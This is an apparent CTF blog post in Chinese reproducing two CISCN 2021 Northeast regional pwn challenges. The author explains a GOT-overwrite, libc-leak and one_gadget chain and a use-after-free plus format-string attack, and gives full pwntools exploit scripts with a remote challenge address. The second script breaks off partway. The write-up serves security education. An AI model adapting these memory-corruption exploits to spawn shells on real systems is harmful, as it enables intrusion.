<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgsfavicon-16x16.png?v=2.6.2" type="image/png" sizes="16x16"><link rel="icon" href="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgsfavicon-32x32.png?v=2.6.2" type="image/png" sizes="32x32"><link rel="mask-icon" href="/%5Bobject%20Object%5D?v=2.6.2" color="#54bcff"><meta name="description" content="复现之前，先骂两句。SB形式，SB的自己。 1.hard:这道题目最他丫SB，上来运行不起来，环境调半天，还是运行不起来，再加上VPN崩溃，一直连不上，还以为题目本身优点问题，只能先放弃，转头帮忙去了。后来checksec一下才发现依赖是.&#x2F;lib&#x2F;，也就是当前文件下需要创建一个lib文件夹，里面放上ld-linux-x86-64.so.2才能运行，我可去他大爷的。 给的分挺高，后面想了想也不算难">
<meta property="og:type" content="article">
<meta property="og:title" content="CISCN2021东北赛区复现">
<meta property="og:url" content="http://pig-007.github.io/2021/08/14/CISCN2021%E4%B8%9C%E5%8C%97%E8%B5%9B%E5%8C%BA%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="PIG-007">
<meta property="og:description" content="复现之前，先骂两句。SB形式，SB的自己。 1.hard:这道题目最他丫SB，上来运行不起来，环境调半天，还是运行不起来，再加上VPN崩溃，一直连不上，还以为题目本身优点问题，只能先放弃，转头帮忙去了。后来checksec一下才发现依赖是.&#x2F;lib&#x2F;，也就是当前文件下需要创建一个lib文件夹，里面放上ld-linux-x86-64.so.2才能运行，我可去他大爷的。 给的分挺高，后面想了想也不算难">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2021-08-14T05:40:30.000Z">
<meta property="article:modified_time" content="2021-08-19T06:26:50.229Z">
<meta property="article:author" content="PIG-007">
<meta property="article:tag" content="比赛">
<meta name="twitter:card" content="summary"><title>CISCN2021东北赛区复现 | PIG-007</title><link ref="canonical" href="http://pig-007.github.io/2021/08/14/CISCN2021%E4%B8%9C%E5%8C%97%E8%B5%9B%E5%8C%BA%E5%A4%8D%E7%8E%B0/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.6.2"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"light","wordWrap":true},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"Copy","copySuccess":"Copy Success","copyError":"Copy Error"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 5.4.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">Home</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">Archives</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/categories/"><span class="header-nav-menu-item__icon"><i class="fas fa-layer-group"></i></span><span class="header-nav-menu-item__text">Categories</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">Tags</span></a></div></div><div class="header-nav-search"><span class="header-nav-search__icon"><i class="fas fa-search"></i></span><span class="header-nav-search__text">Search</span></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">PIG-007</div><div class="header-banner-info__subtitle"></div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">CISCN2021东北赛区复现</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">Created</span><span class="post-meta-item__value">2021-08-14</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">Updated</span><span class="post-meta-item__value">2021-08-19</span></span></div></header><div class="post-body"><p>复现之前，先骂两句。SB形式，SB的自己。</p>
<p>1.hard:这道题目最他丫SB，上来运行不起来，环境调半天，还是运行不起来，再加上VPN崩溃，一直连不上，还以为题目本身优点问题，只能先放弃，转头帮忙去了。后来checksec一下才发现依赖是./lib/，也就是当前文件下需要创建一个lib文件夹，里面放上ld-linux-x86-64.so.2才能运行，我可去他大爷的。</p>
<p>给的分挺高，后面想了想也不算难，主要有三个点。</p>
<p>(1)任意写时修改的地方选择。</p>
<p>(2)calloc传入的nnum为0时，不会申请，会返回0。同样也具备mmap的功能。</p>
<p>(3)最开始初始化的时候，setbuf传入的是_IO_2_1_stdxx的结构体，该结构体在调用scanf，get，printf等需要初始化缓冲区的函数时，会写入缓冲区地址，也就是Libc上某个区域，可以借此联合setbuf来泄露地址。</p>
<p>比赛后和学长交流一下，才想到把最后的puts改成main，我真他丫是个SB，然后就很正常了。</p>
<p>①由于Partial Reload，可以改got表，所以先任意写，将puts改成main，循环程序。</p>
<p>②将exit改成init处的setbuf的地方，将setbuf改成printf，这样再进入init的地方时，就会打印处_IO_2_1_stdxx的结构体的值。</p>
<p>③由于打印_IO_2_1_stdxx的结构体的值时，打印处flag之后就会被0x00截断，所以需要修改flag处的值。这里通过calloc输入过大的nnum时会从mmap申请内存，返回的是mmap空间，也就是libc上的地址。同时由于关闭了PIE，偏移不会发生改变，所以直接调试计算偏移即可。</p>
<p>④泄露地址后，同样利用calloc申请mmap的方法，将calloc_got改成one_gadget即可。</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding:UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#from LibcSearcher import *</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#context.log_level = &#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#context</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line">SigreturnFrame(kernel = <span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line"></span><br><span class="line">binary = <span class="string">&quot;./pwn&quot;</span></span><br><span class="line">libc_file = <span class="string">&quot;/lib/x86_64-linux-gnu/libc-2.31.so&quot;</span></span><br><span class="line"><span class="comment">#libc_file = &quot;&quot;</span></span><br><span class="line"></span><br><span class="line">sd = <span class="keyword">lambda</span> s:p.send(s)</span><br><span class="line">sl = <span class="keyword">lambda</span> s:p.sendline(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> s:p.recv(s)</span><br><span class="line">ru = <span class="keyword">lambda</span> s:p.recvuntil(s)</span><br><span class="line">rl = <span class="keyword">lambda</span> :p.recvline()</span><br><span class="line">sa = <span class="keyword">lambda</span> a,s:p.sendafter(a,s)</span><br><span class="line">sla = <span class="keyword">lambda</span> a,s:p.sendlineafter(a,s)</span><br><span class="line"></span><br><span class="line"><span class="comment">#libcsearcher use</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">malloc_hook = main_arena-0x10</span></span><br><span class="line"><span class="string">obj = LibcSearcher(&quot;__malloc_hook&quot;, malloc_hook)</span></span><br><span class="line"><span class="string">obj = LibcSearcher(&quot;fgets&quot;, 0Xd90)</span></span><br><span class="line"><span class="string">libc_base = fgets-obj.dump(&#x27;fgets&#x27;)</span></span><br><span class="line"><span class="string">system_addr = libc_base + obj.dump(&quot;system&quot;) #system</span></span><br><span class="line"><span class="string">binsh_addr = libc_base + obj.dump(&quot;str_bin_sh&quot;)</span></span><br><span class="line"><span class="string">log.info(&quot;system_addr:0x%x&quot;%system_addr)</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#malloc_hook,main_aren Find</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">python2 LibcOffset.py libc-2.23.so</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#without stripped</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">puts_got = elf.got[&#x27;puts&#x27;]</span></span><br><span class="line"><span class="string">puts_plt = elf.plt[&#x27;puts&#x27;]</span></span><br><span class="line"><span class="string">system_plt = elf.plt[&#x27;system&#x27;]</span></span><br><span class="line"><span class="string">read_plt = elf.plt[&#x27;read&#x27;]</span></span><br><span class="line"><span class="string">main_addr = elf.sym[&#x27;main&#x27;]</span></span><br><span class="line"><span class="string">system_addr = libc_base + libc.sym[&#x27;system&#x27;]</span></span><br><span class="line"><span class="string">binsh_addr = libc_base + libc.search(&#x27;/bin/sh&#x27;).next()</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#usually gadget:</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">u_gadget1 = elf.sym[&#x27;__libc_csu_init&#x27;] + 0x5a</span></span><br><span class="line"><span class="string">u_gadget2 = elf.sym[&#x27;__libc_csu_init&#x27;] + 0x40</span></span><br><span class="line"><span class="string">pop_rdi_ret = elf.sym[&#x27;__libc_csu_init&#x27;] + 0x63</span></span><br><span class="line"><span class="string">ret = elf.sym[&#x27;__libc_csu_init&#x27;] + 0x64</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">local = <span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> local:</span><br><span class="line">    p = process(binary)</span><br><span class="line">    <span class="comment">#p = process([&#x27;./lib/ld-linux-x86-64.so.2&#x27;, &#x27;./tvstation&#x27;], env=&#123;&quot;LD_PRELOAD&quot;:&quot;./lib/libc.so.6&quot;&#125;)</span></span><br><span class="line">    <span class="comment">#p = process(binary, env=&#123;&quot;LD_PRELOAD&quot;:&quot;./libc.so.6&quot;&#125;)</span></span><br><span class="line">    elf = ELF(binary)</span><br><span class="line">    libc = ELF(libc_file)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    p = remote(<span class="string">&quot;119.3.81.43&quot;</span>,<span class="string">&quot;49153&quot;</span>)</span><br><span class="line">    elf = ELF(binary)</span><br><span class="line">    libc = ELF(libc_file)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write</span>(<span class="params">offset, con</span>):</span></span><br><span class="line">    ru(<span class="string">&quot;: &quot;</span>)</span><br><span class="line">    sl(<span class="string">&quot;-1&quot;</span>)</span><br><span class="line">    ru(<span class="string">&quot;: &quot;</span>)</span><br><span class="line">    sl(<span class="built_in">str</span>(offset // <span class="number">4</span>))</span><br><span class="line">    ru(<span class="string">&quot;:&quot;</span>)</span><br><span class="line">    sl(<span class="built_in">str</span>(con))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write2</span>(<span class="params">offset, con</span>):</span></span><br><span class="line">    ru(<span class="string">&quot;: &quot;</span>)</span><br><span class="line">    sl(<span class="built_in">str</span>(<span class="number">0x100000</span>))</span><br><span class="line">    ru(<span class="string">&quot;: &quot;</span>)</span><br><span class="line">    sl(<span class="built_in">str</span>(offset // <span class="number">4</span>))</span><br><span class="line">    ru(<span class="string">&quot;:&quot;</span>)</span><br><span class="line">    sl(<span class="built_in">str</span>(con))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">main_addr = <span class="number">0x40078D</span></span><br><span class="line">puts_got = elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">setbuf_got = elf.got[<span class="string">&#x27;setbuf&#x27;</span>]</span><br><span class="line">exit_got = elf.got[<span class="string">&#x27;exit&#x27;</span>]</span><br><span class="line">printf_plt = elf.plt[<span class="string">&#x27;printf&#x27;</span>]</span><br><span class="line">setbuf_plt = elf.plt[<span class="string">&#x27;setbuf&#x27;</span>]</span><br><span class="line">calloc_got = elf.got[<span class="string">&#x27;calloc&#x27;</span>]</span><br><span class="line">setbuf_init = <span class="number">0x40086a</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">log.info(<span class="string">&quot;puts_got:0x%x&quot;</span>%puts_got)</span><br><span class="line">log.info(<span class="string">&quot;setbuf_got:0x%x&quot;</span>%setbuf_got)</span><br><span class="line">log.info(<span class="string">&quot;exit_got:0x%x&quot;</span>%exit_got)</span><br><span class="line">log.info(<span class="string">&quot;printf_plt:0x%x&quot;</span>%printf_plt)</span><br><span class="line">log.info(<span class="string">&quot;setbuf_plt:0x%x&quot;</span>%setbuf_plt)</span><br><span class="line">log.info(<span class="string">&quot;calloc_got:0x%x&quot;</span>%calloc_got)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">write(puts_got,main_addr) <span class="comment">#puts-&gt;main</span></span><br><span class="line">write(setbuf_got,printf_plt) <span class="comment">#setbuf-&gt;printf</span></span><br><span class="line">write(setbuf_got+<span class="number">4</span>,<span class="string">&quot;0&quot;</span>) <span class="comment">#setbuf-&gt;printf</span></span><br><span class="line">write(exit_got,setbuf_init) <span class="comment">#exit-&gt;setbuf</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(p, &quot;b *(0x400854) \n c&quot;)</span></span><br><span class="line">IO_stdin4_mmap = <span class="number">0x5EC974</span> <span class="comment">#without PIE</span></span><br><span class="line">IO_stdin_1_libc = <span class="number">0x1EBA03</span></span><br><span class="line">write2(IO_stdin4_mmap,<span class="number">0x11111111</span>) <span class="comment">#IO_stdin.flag-&gt;0x111111111fbad208b</span></span><br><span class="line">sla(<span class="string">&#x27;: &#x27;</span>, <span class="built_in">str</span>(<span class="number">256</span>))</span><br><span class="line">leak = u64(p.recvuntil(<span class="string">&quot;\x7f&quot;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>, <span class="string">&quot;\x00&quot;</span>))</span><br><span class="line">libc_base = leak - IO_stdin_1_libc</span><br><span class="line">log.info(<span class="string">&quot;libc_base:0x%x&quot;</span>%libc_base)</span><br><span class="line">one_gadget = libc_base + <span class="number">0xe6c81</span></span><br><span class="line"></span><br><span class="line">ru(<span class="string">&quot;: &quot;</span>)</span><br><span class="line">sl(<span class="string">&quot;0&quot;</span>)</span><br><span class="line">ru(<span class="string">&quot;:&quot;</span>)</span><br><span class="line">sl(<span class="string">&quot;0&quot;</span>)</span><br><span class="line"></span><br><span class="line">write(calloc_got, one_gadget &amp; <span class="number">0xffffffff</span>)</span><br><span class="line">ru(<span class="string">&quot;: &quot;</span>)</span><br><span class="line">sl(<span class="built_in">str</span>(<span class="number">0</span>))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></div></figure>

<p>2.gift：这道题目我认栽，确实是做题经验少了，忘了利用chunk头+chunk联合fastbin的FILO原则来修改chunk头了。</p>
<p>(1)改chunk头，加上UAF漏洞，利用chunk头里的函数指针和参数，改成printf，直接格式化字符串泄露地址。</p>
<p>(2)同样道理，直接改函数指针指向堆上伪造的system_addr，利用参数/bin/sh直接getshell。</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding:UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#from LibcSearcher import *</span></span><br><span class="line"><span class="comment">#context.log_level = &#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#context</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line">SigreturnFrame(kernel = <span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">binary = <span class="string">&quot;./GIFT&quot;</span></span><br><span class="line">libc_file = <span class="string">&quot;/lib/x86_64-linux-gnu/libc-2.23.so&quot;</span></span><br><span class="line"><span class="comment">#libc_file = &quot;/lib/x86_64-linux-gnu/libc-2.27.so&quot;</span></span><br><span class="line"><span class="comment">#libc_file = &quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#libcsearcher use</span></span><br><span class="line"><span class="comment">#32bit:malloc_hook = main_arena-0x18</span></span><br><span class="line"><span class="comment">#32bit:main_arena+56(unsortedbin_addr)</span></span><br><span class="line"><span class="comment">#64bit:main_arena+96(unsortedbin_addr)//88 aslo have</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">malloc_hook = main_arena-0x10</span></span><br><span class="line"><span class="string">obj = LibcSearcher(&quot;__malloc_hook&quot;, malloc_hook)</span></span><br><span class="line"><span class="string">obj = LibcSearcher(&quot;fgets&quot;, 0Xd90)</span></span><br><span class="line"><span class="string">libc_base = fgets-obj.dump(&#x27;fgets&#x27;)</span></span><br><span class="line"><span class="string">system_addr = libc_base + obj.dump(&quot;system&quot;) #system</span></span><br><span class="line"><span class="string">binsh_addr = libc_base + obj.dump(&quot;str_bin_sh&quot;)</span></span><br><span class="line"><span class="string">log.info(&quot;system_addr:0x%x&quot;%system_addr)</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#malloc_hook,main_aren Find</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">python2 LibcOffset.py libc-2.23.so</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#without stripped</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">puts_got = elf.got[&#x27;puts&#x27;]</span></span><br><span class="line"><span class="string">puts_plt = elf.plt[&#x27;puts&#x27;]</span></span><br><span class="line"><span class="string">system_plt = elf.plt[&#x27;system&#x27;]</span></span><br><span class="line"><span class="string">read_plt = elf.plt[&#x27;read&#x27;]</span></span><br><span class="line"><span class="string">main_addr = elf.sym[&#x27;main&#x27;]</span></span><br><span class="line"><span class="string">free_hook = libc_base + libc.sym[&#x27;__free_hook&#x27;]</span></span><br><span class="line"><span class="string">system_addr = libc_base + libc.sym[&#x27;system&#x27;]</span></span><br><span class="line"><span class="string">binsh_addr = libc_base + libc.search(&#x27;/bin/sh&#x27;).next()</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#usually gadget:</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">u_gadget1 = elf.sym[&#x27;__libc_csu_init&#x27;] + 0x5a</span></span><br><span class="line"><span class="string">u_gadget2 = elf.sym[&#x27;__libc_csu_init&#x27;] + 0x40</span></span><br><span class="line"><span class="string">pop_rdi_ret = elf.sym[&#x27;__libc_csu_init&#x27;] + 0x63</span></span><br><span class="line"><span class="string">ret = elf.sym[&#x27;__libc_csu_init&#x27;] + 0x64</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">local = <span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> local:</span><br><span class="line">    p = process(binary)</span><br><span class="line">    <span class="comment">#p = process(binary, env=&#123;&quot;LD_PRELOAD&quot;:&quot;./libc.so.6&quot;&#125;)</span></span><br><span class="line">    elf = ELF(binary)</span><br><span class="line">    libc = ELF(libc_file)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    p = remote(<span class="string">&quot;node3.buuoj.cn&quot;</span>,<span class="string">&quot;49153&quot;</span>)</span><br><span class="line">    elf = ELF(binary)</span><br><span class="line">    libc = ELF(libc_file)</span><br><span class="line"></span><br><span class="line">sd = <span class="keyword">lambda</span> s:p.send(s)</span><br><span class="line">sl = <span class="keyword">lambda</span> s:p.sendline(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> s:p.recv(s)</span><br><span class="line">ru = <span class="keyword">lambda</span> s:p.recvuntil(s)</span><br><span class="line">rl = <span class="keyword">lambda</span> :p.recvline()</span><br><span class="line">sa = <span class="keyword">lambda</span> a,s:p.sendafter(a,s)</span><br><span class="line">sla = <span class="keyword">lambda</span> a,s:p.sendlineafter(a,s)</span><br><span class="line"></span><br><span class="line">menu = <span class="string">&quot;&gt;&gt; &quot;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size, con</span>):</span></span><br><span class="line">    sla(menu, <span class="string">&quot;1&quot;</span>)</span><br><span class="line">    sla(<span class="string">&quot;size: &quot;</span>, <span class="built_in">str</span>(size))</span><br><span class="line">    sa(<span class="string">&quot;content: &quot;</span>, con)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span>(<span class="params">idx</span>):</span></span><br><span class="line">    sla(menu, <span class="string">&quot;2&quot;</span>)</span><br><span class="line">    sla(<span class="string">&quot;index: &quot;</span>, <span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x28</span>, <span class="string">&quot;\x00&quot;</span>) <span class="comment">#0</span></span><br><span class="line">add(<span class="number">0x28</span>, <span class="string">&quot;\x01&quot;</span>) <span class="comment">#1</span></span><br><span class="line"></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x18</span>, <span class="string">&quot;%8$p%9$p&quot;</span>+<span class="string">&quot;\x30&quot;</span>) <span class="comment">#2</span></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">ru(<span class="string">&quot;0x&quot;</span>)</span><br><span class="line">heap_base = <span class="built_in">int</span>(p.recv(<span class="number">12</span>),<span class="number">16</span>)-<span class="number">0x10</span></span><br><span class="line">libc_base = <span class="built_in">int</span>(p.recv(<span class="number">14</span>),<span class="number">16</span>) - <span class="number">0x55810</span></span><br><span class="line"><span class="comment"># li(&quot;libc_base&quot;, libc_base)</span></span><br><span class="line"><span class="comment"># li(&quot;leak&quot;, leak)</span></span><br><span class="line">log.info(<span class="string">&quot;heap_base:0x%x&quot;</span>%heap_base)</span><br><span class="line">log.info(<span class="string">&quot;libc_base:0x%x&quot;</span>%libc_base)</span><br><span class="line"></span><br><span class="line">system_addr = libc_base + libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x38</span>, <span class="string">&quot;\x03&quot;</span>) <span class="comment">#3</span></span><br><span class="line">add(<span class="number">0x38</span>, <span 